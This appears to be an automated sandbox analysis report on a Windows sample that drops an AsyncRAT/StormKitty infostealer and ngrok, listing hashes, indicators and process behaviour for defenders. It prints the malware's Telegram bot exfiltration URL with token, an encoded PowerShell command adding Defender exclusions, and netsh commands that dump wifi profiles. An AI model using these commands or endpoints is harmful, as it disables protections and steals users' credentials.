Analysis
-
max time kernel
152s -
max time network
158s -
platform
windows10-2004_x64 -
resource
win10v2004-20230703-en -
resource tags
arch:x64arch:x86image:win10v2004-20230703-enlocale:en-usos:windows10-2004-x64system -
submitted
13-08-2023 09:50
Static task
static1
Behavioral task
behavioral1
Sample
69a281695cfceb02aec31b7ecc8105a60d606b2fc168ab32964380cd5fa79827_JC.exe
Resource
win7-20230712-en
General
-
Target
69a281695cfceb02aec31b7ecc8105a60d606b2fc168ab32964380cd5fa79827_JC.exe
-
Size
24.0MB
-
MD5
fe7a215f58c846f671142227e0a71061
-
SHA1
f40c456ce9f674ee93d3ef691c1b3aec0c53156b
-
SHA256
69a281695cfceb02aec31b7ecc8105a60d606b2fc168ab32964380cd5fa79827
-
SHA512
ff7efbd82997f802339407e709f074277ea609ac1f30ba1d768c5daac4a4990b7a731361717874fe98d524e0a012333e8b45ea1f83a1cc793fd0a06d8296b1ae
-
SSDEEP
393216:VT4ER8LcdmjoDuUKQhgL9bH3x0PmFhpbgab/bKh17KfxRu7i4Kw5jnS01oufNTda:VT4ER0pjoNvhcX6u1blb/bEmZRGi4Lb5
Malware Config
Extracted
asyncrat
Default
127.0.0.1:6606
127.0.0.1:7707
127.0.0.1:8808
https://api.telegram.org/bot6085983475:AAG9ma6AdbwS2Vmvqb_xIeiP1vbivSAPlXU/sendMessage?chat_id=1829819531
AsyncMutex_6SI8OkPnk
-
delay
3
-
install
false
-
install_folder
%AppData%
Signatures
-
StormKitty
StormKitty is an open source info stealer written in C#.
-
StormKitty payload 5 IoCs
resource yara_rule behavioral2/files/0x00070000000231c3-140.dat family_stormkitty behavioral2/files/0x00070000000231c3-145.dat family_stormkitty behavioral2/files/0x00070000000231c3-146.dat family_stormkitty behavioral2/memory/2484-168-0x0000000000B40000-0x0000000000B70000-memory.dmp family_stormkitty behavioral2/memory/980-173-0x0000028C88650000-0x0000028C88660000-memory.dmp family_stormkitty -
Async RAT payload 4 IoCs
resource yara_rule behavioral2/files/0x00070000000231c3-140.dat asyncrat behavioral2/files/0x00070000000231c3-145.dat asyncrat behavioral2/files/0x00070000000231c3-146.dat asyncrat behavioral2/memory/2484-168-0x0000000000B40000-0x0000000000B70000-memory.dmp asyncrat -
Executes dropped EXE 2 IoCs
pid Process 2484 deneme.exe 3160 ngrok.exe -
Reads user/profile data of web browsers 2 TTPs
Infostealers often target stored browser data, which can include saved credentials etc.
-
Drops desktop.ini file(s) 8 IoCs
description ioc Process File opened for modification C:\Users\Admin\AppData\Local\6f627568f974c19c11aa9116512e52c0\Admin@MSXGLQPS_en-US\Grabber\DRIVE-C\Users\Admin\Desktop\desktop.ini deneme.exe File created C:\Users\Admin\AppData\Local\6f627568f974c19c11aa9116512e52c0\Admin@MSXGLQPS_en-US\Grabber\DRIVE-C\Users\Admin\Documents\desktop.ini deneme.exe File created C:\Users\Admin\AppData\Local\6f627568f974c19c11aa9116512e52c0\Admin@MSXGLQPS_en-US\Grabber\DRIVE-C\Users\Admin\Downloads\desktop.ini deneme.exe File created C:\Users\Admin\AppData\Local\6f627568f974c19c11aa9116512e52c0\Admin@MSXGLQPS_en-US\Grabber\DRIVE-C\Users\Admin\Pictures\Camera Roll\desktop.ini deneme.exe File created C:\Users\Admin\AppData\Local\6f627568f974c19c11aa9116512e52c0\Admin@MSXGLQPS_en-US\Grabber\DRIVE-C\Users\Admin\Pictures\Saved Pictures\desktop.ini deneme.exe File created C:\Users\Admin\AppData\Local\6f627568f974c19c11aa9116512e52c0\Admin@MSXGLQPS_en-US\Grabber\DRIVE-C\Users\Admin\Pictures\desktop.ini deneme.exe File opened for modification C:\Users\Admin\AppData\Local\6f627568f974c19c11aa9116512e52c0\Admin@MSXGLQPS_en-US\Grabber\DRIVE-C\Users\Admin\Pictures\desktop.ini deneme.exe File created C:\Users\Admin\AppData\Local\6f627568f974c19c11aa9116512e52c0\Admin@MSXGLQPS_en-US\Grabber\DRIVE-C\Users\Admin\Desktop\desktop.ini deneme.exe -
Looks up external IP address via web service 1 IoCs
Uses a legitimate IP lookup service to find the infected system's external IP.
flow ioc 32 icanhazip.com -
Looks up geolocation information via web service
Uses a legitimate geolocation service to find the infected system's geolocation info.
-
Enumerates physical storage devices 1 TTPs
Attempts to interact with connected storage/optical drive(s).
-
Suspicious behavior: EnumeratesProcesses 31 IoCs
pid Process 980 powershell.exe 980 powershell.exe 3160 ngrok.exe 3160 ngrok.exe 3160 ngrok.exe 3160 ngrok.exe 2484 deneme.exe 2484 deneme.exe 2484 deneme.exe 2484 deneme.exe 2484 deneme.exe 2484 deneme.exe 2484 deneme.exe 2484 deneme.exe 2484 deneme.exe 2484 deneme.exe 2484 deneme.exe 2484 deneme.exe 2484 deneme.exe 2484 deneme.exe 2484 deneme.exe 2484 deneme.exe 2484 deneme.exe 2484 deneme.exe 2484 deneme.exe 2484 deneme.exe 2484 deneme.exe 2484 deneme.exe 2484 deneme.exe 2484 deneme.exe 2484 deneme.exe -
Suspicious use of AdjustPrivilegeToken 2 IoCs
description pid Process Token: SeDebugPrivilege 980 powershell.exe Token: SeDebugPrivilege 2484 deneme.exe -
Suspicious use of WriteProcessMemory 28 IoCs
description pid Process procid_target PID 4748 wrote to memory of 980 4748 69a281695cfceb02aec31b7ecc8105a60d606b2fc168ab32964380cd5fa79827_JC.exe 82 PID 4748 wrote to memory of 980 4748 69a281695cfceb02aec31b7ecc8105a60d606b2fc168ab32964380cd5fa79827_JC.exe 82 PID 4748 wrote to memory of 2484 4748 69a281695cfceb02aec31b7ecc8105a60d606b2fc168ab32964380cd5fa79827_JC.exe 84 PID 4748 wrote to memory of 2484 4748 69a281695cfceb02aec31b7ecc8105a60d606b2fc168ab32964380cd5fa79827_JC.exe 84 PID 4748 wrote to memory of 2484 4748 69a281695cfceb02aec31b7ecc8105a60d606b2fc168ab32964380cd5fa79827_JC.exe 84 PID 4748 wrote to memory of 3160 4748 69a281695cfceb02aec31b7ecc8105a60d606b2fc168ab32964380cd5fa79827_JC.exe 85 PID 4748 wrote to memory of 3160 4748 69a281695cfceb02aec31b7ecc8105a60d606b2fc168ab32964380cd5fa79827_JC.exe 85 PID 2484 wrote to memory of 3860 2484 deneme.exe 96 PID 2484 wrote to memory of 3860 2484 deneme.exe 96 PID 2484 wrote to memory of 3860 2484 deneme.exe 96 PID 3860 wrote to memory of 1860 3860 cmd.exe 98 PID 3860 wrote to memory of 1860 3860 cmd.exe 98 PID 3860 wrote to memory of 1860 3860 cmd.exe 98 PID 3860 wrote to memory of 2828 3860 cmd.exe 99 PID 3860 wrote to memory of 2828 3860 cmd.exe 99 PID 3860 wrote to memory of 2828 3860 cmd.exe 99 PID 3860 wrote to memory of 1976 3860 cmd.exe 100 PID 3860 wrote to memory of 1976 3860 cmd.exe 100 PID 3860 wrote to memory of 1976 3860 cmd.exe 100 PID 2484 wrote to memory of 3012 2484 deneme.exe 101 PID 2484 wrote to memory of 3012 2484 deneme.exe 101 PID 2484 wrote to memory of 3012 2484 deneme.exe 101 PID 3012 wrote to memory of 3316 3012 cmd.exe 103 PID 3012 wrote to memory of 3316 3012 cmd.exe 103 PID 3012 wrote to memory of 3316 3012 cmd.exe 103 PID 3012 wrote to memory of 4056 3012 cmd.exe 104 PID 3012 wrote to memory of 4056 3012 cmd.exe 104 PID 3012 wrote to memory of 4056 3012 cmd.exe 104
Processes
-
C:\Users\Admin\AppData\Local\Temp\69a281695cfceb02aec31b7ecc8105a60d606b2fc168ab32964380cd5fa79827_JC.exe"C:\Users\Admin\AppData\Local\Temp\69a281695cfceb02aec31b7ecc8105a60d606b2fc168ab32964380cd5fa79827_JC.exe"1⤵
- Suspicious use of WriteProcessMemory
PID:4748 -
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -EncodedCommand "PAAjAHMAYgBmACMAPgBBAGQAZAAtAE0AcABQAHIAZQBmAGUAcgBlAG4AYwBlACAAPAAjAGEAdQBiACMAPgAgAC0ARQB4AGMAbAB1AHMAaQBvAG4AUABhAHQAaAAgAEAAKAAkAGUAbgB2ADoAVQBzAGUAcgBQAHIAbwBmAGkAbABlACwAJABlAG4AdgA6AFMAeQBzAHQAZQBtAEQAcgBpAHYAZQApACAAPAAjAHAAbgBsACMAPgAgAC0ARgBvAHIAYwBlACAAPAAjAGwAegBhACMAPgA="2⤵
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
PID:980
-
-
C:\Users\Admin\AppData\Local\Temp\deneme.exe"C:\Users\Admin\AppData\Local\Temp\deneme.exe"2⤵
- Executes dropped EXE
- Drops desktop.ini file(s)
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
- Suspicious use of WriteProcessMemory
PID:2484 -
C:\Windows\SysWOW64\cmd.exe"cmd.exe" /C chcp 65001 && netsh wlan show profile | findstr All3⤵
- Suspicious use of WriteProcessMemory
PID:3860 -
C:\Windows\SysWOW64\chcp.comchcp 650014⤵PID:1860
-
-
C:\Windows\SysWOW64\netsh.exenetsh wlan show profile4⤵PID:2828
-
-
C:\Windows\SysWOW64\findstr.exefindstr All4⤵PID:1976
-
-
-
C:\Windows\SysWOW64\cmd.exe"cmd.exe" /C chcp 65001 && netsh wlan show networks mode=bssid3⤵
- Suspicious use of WriteProcessMemory
PID:3012 -
C:\Windows\SysWOW64\chcp.comchcp 650014⤵PID:3316
-
-
C:\Windows\SysWOW64\netsh.exenetsh wlan show networks mode=bssid4⤵PID:4056
-
-
-
-
C:\Users\Admin\AppData\Local\Temp\ngrok.exe"C:\Users\Admin\AppData\Local\Temp\ngrok.exe"2⤵
- Executes dropped EXE
- Suspicious behavior: EnumeratesProcesses
PID:3160
-
Network
MITRE ATT&CK Enterprise v15
Replay Monitor
Loading Replay Monitor...
Downloads
-
Filesize
1B
MD5cfcd208495d565ef66e7dff9f98764da
SHA1b6589fc6ab0dc82cf12099d1c2d40ab994e8410c
SHA2565feceb66ffc86f38d952786c6d696c79c2dbc239dd4e91b46729d73a27fb57e9
SHA51231bca02094eb78126a517b206a88c73cfa9ec6f704c7030d18212cace820f025f00bf0ea68dbf3f3a5436ca63b53bf7bf80ad8d5de7d8359d0b7fed9dbc3ab99
-
C:\Users\Admin\AppData\Local\6f627568f974c19c11aa9116512e52c0\Admin@MSXGLQPS_en-US\Browsers\Firefox\Bookmarks.txt
Filesize105B
MD52e9d094dda5cdc3ce6519f75943a4ff4
SHA15d989b4ac8b699781681fe75ed9ef98191a5096c
SHA256c84c98bbf5e0ef9c8d0708b5d60c5bb656b7d6be5135d7f7a8d25557e08cf142
SHA512d1f7eed00959e902bdb2125b91721460d3ff99f3bdfc1f2a343d4f58e8d4e5e5a06c0c6cdc0379211c94510f7c00d7a8b34fa7d0ca0c3d54cbbe878f1e9812b7
-
C:\Users\Admin\AppData\Local\6f627568f974c19c11aa9116512e52c0\Admin@MSXGLQPS_en-US\System\Process.txt
Filesize4KB
MD5ab2421d1e0be0b16ce519f2af166c747
SHA1e0f76610778e24b83eea090cd630b89fd8dc3e77
SHA256b90027f576cb86cc1374a0ae20bc2c093ab96e3146407e9a01476f41c3fc2ab5
SHA512bd38084f17badc6fb6056286dfac4a0307e9e5a75d038795ca0c7886322556e43f0e1df1b7cc45bc1ce88fcfe595b98f58a63efc7d2f6a529fcd43b282d299b7
-
Filesize
60B
MD5d17fe0a3f47be24a6453e9ef58c94641
SHA16ab83620379fc69f80c0242105ddffd7d98d5d9d
SHA25696ad1146eb96877eab5942ae0736b82d8b5e2039a80d3d6932665c1a4c87dcf7
SHA5125b592e58f26c264604f98f6aa12860758ce606d1c63220736cf0c779e4e18e3cec8706930a16c38b20161754d1017d1657d35258e58ca22b18f5b232880dec82
-
Filesize
170KB
MD5958062458cd994df325348bb9f8f9d11
SHA16d678d971f4239f9304a3a6ac9941b9d7de1ba27
SHA256109f96c67f55689c41320f832134501ec02389a813eba1d990d192ab378ad533
SHA512e73c665f0cd3cc53ea4ca0ef50d196fce4783488759bd9f6b8d9cb842382e88327509a317dd328ddf7b7fc988cde06a46cd82fe2783165f75d5f812e231affff
-
Filesize
170KB
MD5958062458cd994df325348bb9f8f9d11
SHA16d678d971f4239f9304a3a6ac9941b9d7de1ba27
SHA256109f96c67f55689c41320f832134501ec02389a813eba1d990d192ab378ad533
SHA512e73c665f0cd3cc53ea4ca0ef50d196fce4783488759bd9f6b8d9cb842382e88327509a317dd328ddf7b7fc988cde06a46cd82fe2783165f75d5f812e231affff
-
Filesize
170KB
MD5958062458cd994df325348bb9f8f9d11
SHA16d678d971f4239f9304a3a6ac9941b9d7de1ba27
SHA256109f96c67f55689c41320f832134501ec02389a813eba1d990d192ab378ad533
SHA512e73c665f0cd3cc53ea4ca0ef50d196fce4783488759bd9f6b8d9cb842382e88327509a317dd328ddf7b7fc988cde06a46cd82fe2783165f75d5f812e231affff
-
Filesize
23.8MB
MD51c900bf7791f168639d27e19a90a9be7
SHA1ff6b857b8aaf8d9ed72ae300575aeb4ff21925db
SHA256b25a372ebb6692fbc2d3697467a7611dbbd521dd61ed995fa82c170c3ef50300
SHA512c0a96693031c56b4375478e7c15f41ef512b7eec72496e26dcb5dc688b13431852e2c30f98ef25a2d06df421e8c688b17fa603887ef3ae6980c6ee3789fe2988
-
Filesize
23.8MB
MD51c900bf7791f168639d27e19a90a9be7
SHA1ff6b857b8aaf8d9ed72ae300575aeb4ff21925db
SHA256b25a372ebb6692fbc2d3697467a7611dbbd521dd61ed995fa82c170c3ef50300
SHA512c0a96693031c56b4375478e7c15f41ef512b7eec72496e26dcb5dc688b13431852e2c30f98ef25a2d06df421e8c688b17fa603887ef3ae6980c6ee3789fe2988
-
Filesize
23.8MB
MD51c900bf7791f168639d27e19a90a9be7
SHA1ff6b857b8aaf8d9ed72ae300575aeb4ff21925db
SHA256b25a372ebb6692fbc2d3697467a7611dbbd521dd61ed995fa82c170c3ef50300
SHA512c0a96693031c56b4375478e7c15f41ef512b7eec72496e26dcb5dc688b13431852e2c30f98ef25a2d06df421e8c688b17fa603887ef3ae6980c6ee3789fe2988